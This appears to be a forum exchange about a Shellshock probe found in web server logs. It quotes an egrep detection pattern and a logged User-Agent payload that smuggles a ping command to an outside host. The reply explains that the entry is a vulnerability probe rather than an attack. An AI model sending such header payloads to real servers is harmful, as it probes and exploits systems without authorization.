egrep "};|}\s*;" /var/www/logs/access*
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
How can we shut down the server behind the IP that did this?
egrep "};|}\s*;" /var/www/logs/access*
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
How can we shut down the server behind the IP that did this?
The log entry you're showing isn't an attack. It's simply a probe to see if you're vulnerable: /bin/ping -c 1 198.101.206.138
means "send a single ICMP echo packet to 198.101.206.138". Further, it only works on systems storing CGI scripts in the non-standard /cgi-sys/
directory, rather than the usual /cgi-bin/
.